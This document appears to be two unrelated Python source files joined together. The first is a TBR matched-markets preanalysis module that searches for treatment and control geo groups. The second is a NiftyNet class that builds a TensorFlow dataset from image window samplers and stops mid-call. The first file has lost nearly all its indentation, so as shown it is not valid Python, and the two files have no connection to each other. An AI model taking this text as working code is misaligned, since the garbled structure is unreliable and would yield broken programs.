# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TBR Matched Markets preanalysis.
"""
import copy
import itertools
from typing import Generator, List, NewType, Set, TypeVar
from matched_markets.methodology import geoeligibility
from matched_markets.methodology import heapdict
from matched_markets.methodology import tbrmmdata
from matched_markets.methodology import tbrmmdesign
from matched_markets.methodology import tbrmmdesignparameters
from matched_markets.methodology import tbrmmdiagnostics
from matched_markets.methodology import tbrmmscore
import numpy as np
import pandas as pd
from scipy import special as scipy_special
TBRMMDesignParameters = tbrmmdesignparameters.TBRMMDesignParameters
TBRMMDiagnostics = tbrmmdiagnostics.TBRMMDiagnostics
TBRMMData = tbrmmdata.TBRMMData
TBRMMDesign = tbrmmdesign.TBRMMDesign
TBRMMScore = tbrmmscore.TBRMMScore
GeoID = NewType('GeoID', str)
GeoIndex = NewType('GeoIndex', int)
DictKey = TypeVar('DictKey', str, int, float)
class TBRMatchedMarkets:
"""TBR Matched Market preanalysis.
Attributes:
data: The TBRMMData object.
parameters: The TBRMMDesignParameters object.
geo_req_impact: Required minimum incremental impact for each individual geo.
"""
data: TBRMMData
parameters: TBRMMDesignParameters
geo_req_impact: pd.Series
def __init__(self, data: TBRMMData, parameters: TBRMMDesignParameters):
"""Initialize a TBRMatchedMarkets object.
Args:
data: A TBRMMData object.
parameters: a TBRMMDesignParameters object.
"""
def estimate_required_impact(y):
return TBRMMDiagnostics(y,
parameters).estimate_required_impact(
parameters.rho_max)
# Consider only the most recent n_pretest_max time points
data.df = data.df.iloc[:, -parameters.n_pretest_max:]
# Calculate the required impact estimates for each geo.
geo_req_impact = data.df.apply(estimate_required_impact, axis=1)
self.geo_req_impact = geo_req_impact
self.data = data
self.parameters = parameters
@property
def geos_over_budget(self) -> Set[GeoID]:
"""Identify geos which do not satisfy the max ad spend budget condition."""
if self.parameters.budget_range is not None:
max_impact = self.parameters.budget_range[1] * self.parameters.iroas
geo_impact = self.geo_req_impact
geos = set(geo_impact.index[geo_impact > max_impact])
else:
geos = set()
return geos
@property
def geos_too_large(self) -> Set[GeoID]:
"""Identify geos which do not satisfy the maximum geo share condition."""
if self.parameters.treatment_share_range is not None:
max_trt_share = self.parameters.treatment_share_range[1]
geo_share = self.data.geo_share
geos = set(geo_share.index[geo_share > max_trt_share])
else:
geos = set()
return geos
@property
def geos_must_include(self) -> Set[GeoID]:
"""Set of geos that must be included in each design."""
geo_assignments = self.data.geo_eligibility.get_eligible_assignments()
return geo_assignments.all - geo_assignments.x
@property
def geos_within_constraints(self) -> Set[GeoID]:
"""Set of geos that are within the geo-specific constraints.
Returns:
Geos that are assignable to control or treatment but not over budget nor
too large, plus those that must be assigned to the treatment or control
group (even if over budget or too large). If the maximum number is
specified, the geos with the highest impact on budget are chosen.
"""
geos_exceed_size = self.geos_too_large | self.geos_over_budget
geos = (self.data.assignable - geos_exceed_size) | self.geos_must_include
n_geos_max = self.parameters.n_geos_max
if n_geos_max is not None and len(geos) > n_geos_max:
geos_with_max_impact = list(
self.geo_req_impact.sort_values(ascending=False).index)
geos_in_order = list(geo for geo in geos_with_max_impact if geo in geos)
geos = set(geos_in_order[:n_geos_max])
return geos
@property
def geo_assignments(self) -> geoeligibility.GeoAssignments:
"""Return the possible geo assignments."""
geos_included = self.geos_within_constraints
# Order geos in the order of implied budget size ('expensive' first).
geos_in_order = list(self.geo_req_impact.index)
geo_index = [geo for geo in geos_in_order if geo in geos_included]
self.data.geo_index = geo_index
return self.data.geo_assignments
def treatment_group_size_range(self) -> range:
"""Range from smallest to largest possible treatment group size."""
n_treatment_min = max(1, len(self.geo_assignments.t_fixed))
n_treatment_max = len(self.geo_assignments.t)
if not self.geo_assignments.cx | self.geo_assignments.c_fixed:
# No geos left outside the group 't', so reserve at least one geo for the
# control group.
n_treatment_max -= 1
treatment_geos_range = self.parameters.treatment_geos_range
if treatment_geos_range is None:
n_geos_from, n_geos_to = (n_treatment_min, n_treatment_max)
else:
n_geos_from = max(treatment_geos_range[0], n_treatment_min)
n_geos_to = min(treatment_geos_range[1], n_treatment_max)
return range(n_geos_from, n_geos_to + 1)
def _control_group_size_generator(
self,
n_treatment_geos: int) -> Generator[int, None, None]:
"""Acceptable control group sizes, given treatment group size.
Args:
n_treatment_geos: Number of treatment geos.
Yields:
Control group sizes that agree with the range and ratio constraints.
"""
n_control_min = max(1, len(self.geo_assignments.c_fixed))
n_control_max = len(self.geo_assignments.c)
control_geos_range = self.parameters.control_geos_range
if control_geos_range is None:
n_geos_from, n_geos_to = (n_control_min, n_control_max)
else:
n_geos_from = max(control_geos_range[0], n_control_min)
n_geos_to = min(control_geos_range[1], n_control_max)
if self.parameters.geo_ratio_tolerance is None:
yield from range(n_geos_from, n_geos_to + 1)
else:
geo_tol_max = 1.0 + self.parameters.geo_ratio_tolerance
geo_tol_min = 1.0 / geo_tol_max
for n_control_geos in range(n_geos_from, n_geos_to + 1):
geo_ratio = n_control_geos / n_treatment_geos
if geo_ratio >= geo_tol_min and geo_ratio <= geo_tol_max:
yield n_control_geos
def treatment_group_generator(
self,
n: int) -> Generator[Set[GeoIndex], None, None]:
"""Generates all possible treatment groups of given size.
    The indices will be generated in order from smallest to largest, e.g.,
    choosing n=2 geos out of {0, 1, 2, 3} will yield the sequence {0, 1}, {0,
    2}, {0, 3}, {1, 2}, {1, 3}, {2, 3}. The indices refer to geos from largest
    to smallest, i.e., geo 0 is the largest and the highest index is the
    smallest. The fixed geos will be added to the set.
Args:
n: Size of the treatment group.
Raises:
ValueError if n is not positive.
Yields:
Sets of geo indices, of length n each. If there are not enough geos
available, does not yield anything.
"""
if n <= 0:
raise ValueError('Treatment group size n must be positive')
fixed_treatment_geos = self.geo_assignments.t_fixed
varying_treatment_geos = self.geo_assignments.t - fixed_treatment_geos
n_remaining = n - len(fixed_treatment_geos)
if n_remaining == 0 and fixed_treatment_geos:
yield fixed_treatment_geos # pytype: disable=bad-return-type
elif n_remaining > 0:
it = itertools.combinations(varying_treatment_geos, n_remaining)
for treatment_geos_combination in it:
treatment_group = fixed_treatment_geos | set(treatment_geos_combination)
yield treatment_group # pytype: disable=bad-return-type
def control_group_generator(
self,
treatment_group: Set[GeoIndex]) -> Generator[Set[GeoIndex], None, None]:
"""Iterates over control geo combinations, given a treatment group.
Args:
treatment_group: Set of treatment geos. The sequence of control groups is
constructed from the remaining geos.
Yields:
Sets of geo indices representing control groups. If there are not enough
geos available, does not yield anything.
"""
if not treatment_group:
raise ValueError('Treatment group must not be empty')
# The treatment group must be a subset of the available treatment geos.
invalid_geo_indices = treatment_group - self.geo_assignments.t
if invalid_geo_indices:
geos = [str(geo_index) for geo_index in sorted(invalid_geo_indices)]
raise ValueError(
'Invalid treatment geo indices: ' + ', '.join(geos))
# The fixed control geos are those that belong to either 'c_fixed' or 'ct'.
# The geos in the group 'ct' must be assigned to control or treatment, but
# not excluded.
ct_geos_not_in_treatment = self.geo_assignments.ct - treatment_group
fixed_control_geos = self.geo_assignments.c_fixed | ct_geos_not_in_treatment
possible_control_geos = self.geo_assignments.c - treatment_group
# The 'varying control geos' can be in the groups 'cx' or 'ctx' only.
varying_control_geos = possible_control_geos - fixed_control_geos
n_treatment_geos = len(treatment_group)
for n_control_geos in self._control_group_size_generator(n_treatment_geos):
n_remaining = n_control_geos - len(fixed_control_geos)
if n_remaining == 0 and fixed_control_geos:
yield fixed_control_geos # pytype: disable=bad-return-type
elif n_remaining > 0:
# If n_remaining > len(varying_control_geos), the generator will not
# return anything.
it = itertools.combinations(varying_control_geos, n_remaining)
for control_geos in it:
control_group = fixed_control_geos | set(control_geos)
yield control_group # pytype: disable=bad-return-type
def count_max_designs(self) -> int:
"""Count (fast) how many designs there are at most.
    Only the group sizes and their ratio are used as constraints.
Returns:
Maximum number of designs under the constraint of the geo eligibility
matrix, and the geo group sizes and allowed ratios.
"""
n_t_fixed = len(self.geo_assignments.t_fixed)
n_c_fixed = len(self.geo_assignments.c_fixed)
n_cx = len(self.geo_assignments.cx)
n_tx = len(self.geo_assignments.tx)
n_ct = len(self.geo_assignments.ct)
n_ctx = len(self.geo_assignments.ctx)
trt_sizes = set(self.treatment_group_size_range())
# Pre-compute the control sizes to avoid repetition within the loop.
control_group_sizes = {}
for n_trt in trt_sizes:
group_sizes = set(self._control_group_size_generator(n_trt))
control_group_sizes[n_trt] = group_sizes
n_designs = 0
# Split the space into the subspaces cx, tx, ct, ctx.
comb = scipy_special.comb
for i_ct in range(1 + n_ct):
n1 = comb(n_ct, i_ct, exact=True)
for i_tx in range(1 + n_tx):
n2 = comb(n_tx, i_tx, exact=True)
for i_ctx in range(1 + n_ctx):
n_trt = n_t_fixed + i_tx + i_ctx + i_ct
if n_trt in trt_sizes:
ctl_sizes = control_group_sizes[n_trt]
n3 = comb(n_ctx, i_ctx, exact=True)
for i_cx in range(1 + n_cx):
n4 = comb(n_cx, i_cx, exact=True)
for i_cctx in range(1 + n_ctx - i_ctx):
n_ctl = n_c_fixed + i_cx + i_cctx + (n_ct - i_ct)
if n_ctl in ctl_sizes:
n5 = comb(n_ctx - i_ctx, i_cctx, exact=True)
n_designs += n1 * n2 * n3 * n4 * n5
return n_designs
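  # Editor's note (illustrative, not from the original source): a worked
  # instance of the counting above. With no fixed geos and empty 'ct'/'ctx'
  # groups, a design is simply a choice of treatment geos from 'tx' and
  # control geos from 'cx'; e.g. with n_tx = 3 and n_cx = 4, one treatment geo
  # and two control geos can be chosen in comb(3, 1) * comb(4, 2) = 18 ways,
  # and count_max_designs sums such products over all admissible size pairs.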
def exhaustive_search(self) -> List[TBRMMDesign]:
"""Search the design space for acceptable designs, within the constraints.
Returns:
the set of feasible designs found given the design parameters,
with their corresponding treatment/control groups and score.
"""
treatment_share_range = self.parameters.treatment_share_range
budget_range = self.parameters.budget_range
    # Do not store treatment patterns once the largest treatment group size is
    # reached, since no supersets of those groups will be generated later.
skip_this_trt_group_size = list(self.treatment_group_size_range()).pop()
skip_treatment_geo_patterns = []
results = heapdict.HeapDict(size=self.parameters.n_designs)
def skip_if_subset(geos: Set[GeoIndex]) -> bool:
"""Check if one of the stored geo patterns is a subset of the geos.
Args:
geos: Set of geo indices.
Returns:
bool: True if one of the stored groups is a subset of the geos.
"""
for p in skip_treatment_geo_patterns:
if set(p).issubset(geos):
return True
return False
volume_tol = self.parameters.volume_ratio_tolerance
if volume_tol is not None:
tol_min = 1.0 / (1.0 + volume_tol)
tol_max = 1.0 + volume_tol
treatment_group_sizes = self.treatment_group_size_range()
for treatment_group_size in treatment_group_sizes:
# Treatment groups are saved for the purpose of the inclusion check.
save_treatment_groups = (treatment_group_size != skip_this_trt_group_size)
treatment_groups = self.treatment_group_generator(treatment_group_size)
for treatment_group in treatment_groups:
treatment_share = self.data.aggregate_geo_share(treatment_group)
if treatment_share_range is not None:
# Skip this treatment group if the group implies too low or high share
# of response volume.
if (treatment_share > treatment_share_range[1] or
treatment_share < treatment_share_range[0]):
continue
elif skip_if_subset(treatment_group):
# If the group is a superset of a group that we already know has too
# high a share or budget, then skip this group too.
continue
y = self.data.aggregate_time_series(treatment_group)
diag = TBRMMDiagnostics(y, self.parameters)
req_impact = diag.estimate_required_impact(self.parameters.rho_max)
req_budget = req_impact / self.parameters.iroas
if budget_range is not None:
# If the budget is too high, skip this treatment group.
if req_budget > budget_range[1]:
if save_treatment_groups:
# We skip all treatment groups that are a superset of a treatment
# group that has too high an estimated budget.
skip_treatment_geo_patterns.append(treatment_group)
continue
# If the budget is too low, skip this treatment group.
elif req_budget < budget_range[0]:
continue
control_groups = self.control_group_generator(treatment_group)
for control_group in control_groups:
if volume_tol is not None:
control_share = self.data.aggregate_geo_share(control_group)
xy_share = control_share / treatment_share
if xy_share > tol_max or xy_share < tol_min:
continue
diag.x = self.data.aggregate_time_series(control_group)
corr = diag.corr # pylint: disable=unused-variable
req_impact = diag.required_impact
req_budget = req_impact / self.parameters.iroas
if (budget_range is not None and (self._constraint_not_satisfied(
req_budget, budget_range[0], budget_range[1]))):
continue
# deepcopy is needed otherwise diag.corr gets overwritten, and so
# it will not be equal to diag.score.score.corr for some reason
design_score = TBRMMScore(copy.deepcopy(diag))
score = design_score.score
if budget_range is not None:
# If the budget was specified then we use the inverse of the
# minimum detectable iROAS for the max. budget as the last value
            # in the scoring, instead of using the same for a budget of $1
iroas = req_impact / budget_range[1]
design_score.score = score._replace(inv_required_impact=1 / iroas)
# deepcopy is needed otherwise diag.corr gets overwritten, and so
# it will not be equal to diag.score.score.corr for some reason
design = TBRMMDesign(
design_score, treatment_group, control_group,
copy.deepcopy(diag))
results.push(0, design)
self._search_results = results
return self.search_results()
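  # Editor's note (illustrative, not from the original source): the pruning in
  # exhaustive_search works on supersets. For example, if treatment group
  # {geo_1, geo_2} already requires a budget above budget_range[1], then every
  # candidate containing {geo_1, geo_2}, such as {geo_1, geo_2, geo_3}, is
  # skipped by skip_if_subset() without re-estimating its required budget, on
  # the assumption that adding geos does not lower the required impact.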
def search_results(self):
"""Outputs the results of the exhaustive search in a friendly format.
Returns:
results: the set of feasible designs found given the design parameters,
with their corresponding treatment/control groups and score.
"""
result = self._search_results.get_result()
output_result = []
if result:
design = result[0]
# map from geo indices to geo IDs.
for d in design:
treatment_geos = {self.data.geo_index[x] for x in d.treatment_geos}
control_geos = {self.data.geo_index[x] for x in d.control_geos}
d.treatment_geos = treatment_geos
d.control_geos = control_geos
output_result.append(d)
return output_result
@staticmethod
def _constraint_not_satisfied(parameter_value: float,
constraint_lower: float,
constraint_upper: float) -> bool:
"""Checks if the parameter value is in the interval [constraint_lower, constraint_upper]."""
return (parameter_value < constraint_lower) | (
parameter_value > constraint_upper)
def design_within_constraints(self, treatment_geos: Set[GeoIndex],
control_geos: Set[GeoIndex]):
"""Checks if a set of control/treatment geos passes all constraints.
Given a set of control and treatment geos we verify that some of their
metrics are within the bounds specified in TBRMMDesignParameters.
Args:
treatment_geos: Set of geo indices referring to the geos in treatment.
control_geos: Set of geo indices referring to the geos in control.
Returns:
False if any specified constraint is not satisfied.
"""
if self.parameters.volume_ratio_tolerance is not None:
volume_ratio = (
self.data.aggregate_geo_share(control_geos)/
self.data.aggregate_geo_share(treatment_geos))
if self._constraint_not_satisfied(
volume_ratio, 1 / (1 + self.parameters.volume_ratio_tolerance),
1 + self.parameters.volume_ratio_tolerance):
return False
if self.parameters.geo_ratio_tolerance is not None:
geo_ratio = len(control_geos) / len(treatment_geos)
if self._constraint_not_satisfied(
geo_ratio, 1 / (1 + self.parameters.geo_ratio_tolerance),
1 + self.parameters.geo_ratio_tolerance):
return False
if self.parameters.treatment_share_range is not None:
treatment_response_share = self.data.aggregate_geo_share(
treatment_geos) / self.data.aggregate_geo_share(
self.geo_assignments.all)
if self._constraint_not_satisfied(
treatment_response_share, self.parameters.treatment_share_range[0],
self.parameters.treatment_share_range[1]):
return False
if self.parameters.treatment_geos_range is not None:
num_treatment_geos = len(treatment_geos)
if self._constraint_not_satisfied(
num_treatment_geos, self.parameters.treatment_geos_range[0],
self.parameters.treatment_geos_range[1]):
return False
if self.parameters.control_geos_range is not None:
num_control_geos = len(control_geos)
if self._constraint_not_satisfied(num_control_geos,
self.parameters.control_geos_range[0],
self.parameters.control_geos_range[1]):
return False
return True
def greedy_search(self):
"""Searches the Matched Markets for a TBR experiment.
Uses a greedy hill climbing algorithm to provide recommended 'matched
markets' experimental group assignments that appear to lead to valid and
    effective TBR models relative to the pretest period. The algorithm
    alternates between two routines:
1) Looks for the best set of control geos given the current
set of treatment geos.
2) Adds one new geo to the set of treatment geos given
the current control group.
See Au (2018) for more details.
Returns:
the set of feasible designs found given the design parameters,
with their corresponding treatment/control groups and score.
"""
budget_range = self.parameters.budget_range
results = heapdict.HeapDict(size=self.parameters.n_designs)
if self.parameters.treatment_geos_range is None:
n_treatment = len(self.geo_assignments.t)
max_treatment_size = n_treatment
n_remaining = len(self.geo_assignments.all) - n_treatment
if n_remaining == 0:
max_treatment_size = n_treatment - 1
self.parameters.treatment_geos_range = (1, max_treatment_size)
else:
max_treatment_size = self.parameters.treatment_geos_range[1]
if self.parameters.control_geos_range is None:
n_control = len(self.geo_assignments.c)
max_control_size = n_control
n_remaining = len(self.geo_assignments.all) - n_control
if n_remaining == 0:
max_control_size = n_control - 1
self.parameters.control_geos_range = (1, max_control_size)
kappa_0 = len(self.geo_assignments.t_fixed)
group_star_trt = {kappa_0: self.geo_assignments.t_fixed}
tmp_diag = TBRMMDiagnostics(np.random.normal(range(100)), self.parameters)
tmp_diag.x = list(range(len(tmp_diag.y)))
tmp_score = TBRMMScore(tmp_diag)
tmp_score.score = tmp_score.score._replace(
corr_test=0,
aa_test=0,
bb_test=0,
dw_test=0,
corr=0,
inv_required_impact=0)
score_star = {kappa_0: tmp_score}
group_ctl = self.geo_assignments.c
if kappa_0 == 0:
group_star_ctl = {kappa_0: group_ctl}
needs_matching = False
else:
group_star_ctl = {}
needs_matching = True
k = kappa_0
while (k < max_treatment_size) | (needs_matching):
# Find the best control group given the current treatment group
if needs_matching:
r_control = self.geo_assignments.c - (group_ctl | group_star_trt[k])
r_unassigned = (group_ctl & self.geo_assignments.x) - group_star_trt[k]
reassignable_geos = r_control | r_unassigned
treatment_time_series = self.data.aggregate_time_series(
group_star_trt[k])
current_design = TBRMMDiagnostics(treatment_time_series,
self.parameters)
current_design.x = self.data.aggregate_time_series(group_ctl)
current_score = TBRMMScore(current_design)
group_ctl_tmp = group_ctl
for geo in reassignable_geos:
neighboring_control_group = group_ctl.symmetric_difference([geo])
# we skip checking constraints for designs with less than the minimum
# number of treatment geos, or above the maximum number of control
# geos. Otherwise, we will never be able to augment the size of
# treatment (to reach a size which would pass the checks) or decrease
# the size of control
if (k >= self.parameters.treatment_geos_range[0]) and (
len(neighboring_control_group) <=
self.parameters.control_geos_range[1]):
if (not neighboring_control_group) or (
not self.design_within_constraints(group_star_trt[k],
neighboring_control_group)): # pytype: disable=wrong-arg-types
continue
neighbor_design = tbrmmdiagnostics.TBRMMDiagnostics(
treatment_time_series, self.parameters)
neighbor_design.x = self.data.aggregate_time_series(
neighboring_control_group)
req_impact = neighbor_design.required_impact
req_budget = req_impact / self.parameters.iroas
if (budget_range is not None) and (self._constraint_not_satisfied(
req_budget, budget_range[0], budget_range[1])):
continue
score = TBRMMScore(neighbor_design)
if score > current_score:
group_ctl_tmp = neighboring_control_group
current_score = score
if current_score > TBRMMScore(current_design):
group_ctl = group_ctl_tmp
else:
group_star_ctl[k] = group_ctl_tmp
score_star[k] = current_score
needs_matching = False
# add one geo to treatment given the current control group
elif k < max_treatment_size:
r_treatment = self.geo_assignments.t - group_star_trt[k]
current_score = copy.deepcopy(tmp_score)
group_trt = group_star_trt[k]
for geo in r_treatment:
augmented_treatment_group = group_star_trt[k].union([geo])
updated_control_group = group_star_ctl[k] - set([geo])
          # Same rationale as the analogous if statement in the control-
          # matching branch above: skip the constraint check while the
          # treatment group is still below its minimum size or the candidate
          # control group exceeds its maximum size.
          if (k >= self.parameters.treatment_geos_range[0]) and (
              len(updated_control_group) <=
              self.parameters.control_geos_range[1]):
if (not updated_control_group) or (
not self.design_within_constraints(augmented_treatment_group,
updated_control_group)):
continue
treatment_time_series = self.data.aggregate_time_series(
augmented_treatment_group)
neighbor_design = TBRMMDiagnostics(
treatment_time_series, self.parameters)
neighbor_design.x = self.data.aggregate_time_series(
updated_control_group)
req_impact = neighbor_design.required_impact
req_budget = req_impact / self.parameters.iroas
if (budget_range is not None) and (self._constraint_not_satisfied(
req_budget, budget_range[0], budget_range[1])):
continue
score = TBRMMScore(neighbor_design)
if score > current_score:
group_ctl = updated_control_group
group_trt = augmented_treatment_group
current_score = score
group_star_trt[k+1] = group_trt
k = k + 1
needs_matching = True
# if some geos are fixed to treatment, we did not check that the design
# with treatment group = {all geos fixed in treatment} and control group =
# {all geos that can be assigned to control} pass the diagnostic tests
if kappa_0 > 0:
diagnostic = TBRMMDiagnostics(
self.data.aggregate_time_series(group_star_trt[kappa_0]),
self.parameters)
diagnostic.x = self.data.aggregate_time_series(group_star_ctl[kappa_0])
req_impact = diagnostic.required_impact
req_budget = req_impact / self.parameters.iroas
if (not group_star_ctl[kappa_0]) or (not self.design_within_constraints(
    group_star_trt[kappa_0], group_star_ctl[kappa_0])) or (
        (budget_range is not None) and (self._constraint_not_satisfied(
            req_budget, budget_range[0], budget_range[1]))):
  group_star_trt.pop(kappa_0, None)
  group_star_ctl.pop(kappa_0, None)
  score_star.pop(kappa_0, None)
group_star_trt.pop(0, None)
group_star_ctl.pop(0, None)
score_star.pop(0, None)
for k in group_star_trt:
if self.design_within_constraints(group_star_trt[k], group_star_ctl[k]):
design_diag = TBRMMDiagnostics(
self.data.aggregate_time_series(group_star_trt[k]), self.parameters)
design_diag.x = self.data.aggregate_time_series(group_star_ctl[k])
design_score = TBRMMScore(design_diag)
design = TBRMMDesign(
design_score, group_star_trt[k], group_star_ctl[k],
copy.deepcopy(design_diag))
results.push(0, design)
self._search_results = results
return self.search_results()
|
|
# -*- coding: utf-8 -*-
"""
Creating a ``tf.data.Dataset`` instance for an image window sampler.
"""
from __future__ import absolute_import, division, print_function
import inspect
import numpy as np
import tensorflow as tf
# pylint: disable=no-name-in-module
from tensorflow.python.data.util import nest
from tensorflow.python.keras.utils import GeneratorEnqueuer
from niftynet.engine.image_window import ImageWindow, N_SPATIAL, \
LOCATION_FORMAT, BUFFER_POSITION_NP_TYPE
from niftynet.io.misc_io import squeeze_spatial_temporal_dim
from niftynet.layer.base_layer import Layer
from niftynet.utilities.util_common import look_up_operations
# when total number of window samples are not divisible by batch_size
# the class supports different modes for the final batch
# 'drop': drop the remainder batch
# 'pad': padding the final smaller batch with -1s
# 'dynamic': output the remainder directly (in this case the batch_size
# is undetermined at 'compile time')
SMALLER_FINAL_BATCH_MODE = {'drop', 'pad', 'dynamic'}
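# Example (illustrative): with 7 windows and batch_size=3 the final batch has
# a single window; 'drop' yields two batches of 3 and discards the last
# window, 'pad' yields three batches of 3 with the last batch padded with
# -1s, and 'dynamic' yields batches of size 3, 3 and 1.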
# pylint: disable=too-many-instance-attributes
class ImageWindowDataset(Layer):
"""
This class creates a ``tf.data.Dataset`` instance from
a sampler's layer_op function or generator.
If ``from_generator`` is True, the ``Dataset.from_generator`` interface
will be used; otherwise the ``Dataset.map`` interface will be used::
if the windows are from a image reader,
the total number of windows produced
will be: `epoch x n_subjects x windows_per_image`
if the windows are from a generator,
the total number of windows produced
will be: "iterations from the generator" x num_threads
"""
# pylint: disable=too-many-arguments
def __init__(self,
reader=None,
window_sizes=None,
batch_size=1,
windows_per_image=1,
queue_length=10,
shuffle=True,
epoch=-1,
smaller_final_batch_mode='pad',
seed=None,
name='image_dataset'):
Layer.__init__(self, name=name)
self._num_threads = 1
self._enqueuer = None
self._seed = seed
self.dataset = None
self.iterator = None
self.reader = reader
self.batch_size = batch_size
self.queue_length = int(max(queue_length, round(batch_size * 5.0)))
if self.queue_length > queue_length:
tf.logging.warning(
'sampler queue_length should be larger than batch_size, '
'defaulting to batch_size * 5.0 (%s).', self.queue_length)
self.from_generator = inspect.isgeneratorfunction(self.layer_op)
self.shuffle = shuffle
self.epoch = 1 if self.from_generator else epoch
self.smaller_final_batch_mode = look_up_operations(
smaller_final_batch_mode.lower(), SMALLER_FINAL_BATCH_MODE)
self.n_subjects = 1
self.window = None
if reader is not None:
self.window = ImageWindow.from_data_reader_properties(
reader.input_sources,
reader.shapes,
reader.tf_dtypes,
window_sizes or (-1, -1, -1))
self.n_subjects = reader.num_subjects
self.window.n_samples = windows_per_image
@property
def shapes(self):
"""
the sampler output (value of ``layer_op``) is::
[windows_per_image, x, y, z, 1, channels]
returns a dictionary of sampler output shapes
"""
assert self.window, 'Unknown output shapes: self.window not initialised'
return self.window.shapes
@property
def tf_shapes(self):
"""
returns a dictionary of sampler output tensor shapes
"""
assert self.window, 'Unknown output shapes: self.window not initialised'
return self.window.tf_shapes
@property
def tf_dtypes(self):
"""
returns a dictionary of sampler output tensorflow dtypes
"""
assert self.window, 'Unknown output dtypes: self.window not initialised'
return self.window.tf_dtypes
def set_num_threads(self, num_threads):
"""
Set the number of windows to generate in parallel.
"""
self._num_threads = int(num_threads)
def layer_op(self, idx=None):
"""
Generates each image as a window.
Override this function to create new image sampling strategies.
This function should either yield or return a dictionary
(of multiple windows per image)::
return a dictionary:
{
'image_name': a numpy array [n_samples, h, w, d, chn],
'image_name_location': [n_samples, 7]
}
where the 7-element location vector encodes the image_id,
starting and ending coordinates of the image window.
Following the same notation, the dictionary can be extended
to multiple modalities; the keys will be::
{'image_name_1', 'image_name_1_location',
'image_name_2', 'image_name_2_location', ...}
:param idx: image_id used to load the image at the i-th row of
the input
:return: an image data dictionary
"""
image_id, image_data, _ = self.reader(idx=idx)
for mod in list(image_data):
spatial_shape = image_data[mod].shape[:N_SPATIAL]
coords = self.dummy_coordinates(image_id, spatial_shape, 1)
image_data[LOCATION_FORMAT.format(mod)] = coords
image_data[mod] = image_data[mod][np.newaxis, ...]
return image_data
# # The following is a demo of generator as the layer_op
# # Often we don't know the total number of elements that
# # will be generated, epoch is always 1.
# for idx in range(100):
# image_id, image_data, _ = self.reader()
# for mod in list(image_data):
# spatial_shape = image_data[mod].shape[:N_SPATIAL]
# coords = self.dummy_coordinates(image_id, spatial_shape, 1)
# image_data[LOCATION_FORMAT.format(mod)] = coords
# image_data[mod] = image_data[mod][np.newaxis, ...]
# yield image_data
def pop_batch_op(self):
"""
This function is used when connecting a sampler output
to a network. e.g.::
data_dict = self.get_sampler()[0].pop_batch_op(device_id)
net_output = net_model(data_dict['image'], is_training)
.. caution::
Note it squeezes the output tensor of 6 dims
``[batch, x, y, z, time, modality]``
by removing all dims along which length is one.
:return: a dictionary of image window tensors.
"""
if self.dataset is None or self.iterator is None:
# in case `run_threads` is not called,
# here we initialise the dataset and iterator
self.init_dataset()
self.iterator = self.dataset.make_one_shot_iterator()
# self.iterator = tf.data.Iterator.from_structure(
# self.dataset.output_types, self.dataset.output_shapes)
window_output = self.iterator.get_next()
for name in window_output:
window_output[name] = squeeze_spatial_temporal_dim(
window_output[name])
return window_output
def init_dataset(self):
"""
Make a window samples dataset from the reader and layer_op.
This function sets ``self.dataset``.
:return:
"""
if not self.from_generator:
dataset = self._dataset_from_range()
else:
dataset = self._dataset_from_generator()
self.dataset = self.dataset_preprocessing(dataset)
def dataset_preprocessing(self, dataset):
"""
dataset: batch and shuffle
:param dataset: a `tf.data.Dataset` instance
:return: a `tf.data.Dataset` instance
"""
dataset = dataset.repeat(self.epoch)
dataset = dataset.prefetch(buffer_size=self.queue_length)
if self.shuffle:
# locally shuffle the buffer of image windows
dataset = dataset.shuffle(
buffer_size=self.queue_length, seed=self._seed)
if self.smaller_final_batch_mode == 'drop':
# drop the remainder if there aren't enough windows to
# form a batch, so that we have a fixed batch size.
# dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(
# batch_size=self.batch_size))
# new API since TF 1.10
dataset = dataset.batch(batch_size=self.batch_size,
drop_remainder=True)
return dataset
dataset = dataset.batch(batch_size=self.batch_size)
if self.smaller_final_batch_mode == 'dynamic' and self.batch_size > 1:
return dataset
# self.smaller_final_batch_mode is 'pad'
# if self.batch_size == 1 no actual padding
# but this function will set the output shapes properly.
def _pad_batch(batch_size):
def _pad_batch_func(input_tensor_dict):
"""
function to pad the batch dim to `batch_size`.
(assuming the input dataset is a dictionary-based one)
"""
out_dict = {}
for in_name in list(input_tensor_dict):
in_var = input_tensor_dict[in_name]
var_shape = in_var.shape.as_list()
if batch_size > 1:
paddings = [[0, 0] for _ in in_var.shape]
paddings[0][1] = batch_size - tf.shape(in_var)[0]
in_var = tf.pad(
in_var, paddings, "CONSTANT", constant_values=-1)
var_shape[0] = batch_size
in_var.set_shape(var_shape)
out_dict[in_name] = in_var
return out_dict
return _pad_batch_func
dataset = dataset.map(_pad_batch(self.batch_size))
return dataset
# pylint: disable=redefined-variable-type
def _dataset_from_range(self):
"""
This function maps a dataset of integers to a dataset of images.
:return: a `tf.data.Dataset`
"""
# dataset: a list of integers
tf.logging.info(
'Initialising Dataset from %s subjects...', self.n_subjects)
dataset = tf.data.Dataset.range(self.n_subjects)
if self.shuffle:
# global shuffle of the entire set of subjects
dataset = dataset.shuffle(
buffer_size=self.n_subjects, seed=self._seed)
# dataset: map each integer i to n windows sampled from subject i
def _tf_wrapper(idx):
flattened_types = nest.flatten(self.tf_dtypes)
flattened_shapes = nest.flatten(self.tf_shapes)
flat_values = tf.py_func(
func=lambda subject_id: nest.flatten(self(subject_id)),
inp=[idx],
Tout=flattened_types)
for ret_t, shape in zip(flat_values, flattened_shapes):
# the actual returned numpy array shapes are not checked
ret_t.set_shape(shape)
return nest.pack_sequence_as(self.tf_dtypes, flat_values)
dataset = dataset.map(_tf_wrapper, num_parallel_calls=self._num_threads)
# dataset: slice the n-element window into n single windows
dataset = dataset.flat_map(map_func=tf.data.Dataset.from_tensor_slices)
return dataset
def _dataset_from_generator(self):
"""
Create a `tf.data.Dataset` from a layer_op (as a generator).
:return: a `tf.data.Dataset`
"""
tf.logging.info('Initialising dataset from generator...')
if self._num_threads < 2 or not self.shuffle:
window_generator = self
else:
# self._enqueuer = GeneratorEnqueuer(
# self(),
# use_multiprocessing=True,
# wait_time=0.01,
# seed=self._seed)
self._enqueuer = GeneratorEnqueuer(
self(),
use_multiprocessing=True)
self._enqueuer.start(
workers=self._num_threads, max_queue_size=self.queue_length)
window_generator = self._enqueuer.get
# dataset from generator
dataset = tf.data.Dataset.from_generator(
generator=window_generator,
output_types=self.tf_dtypes,
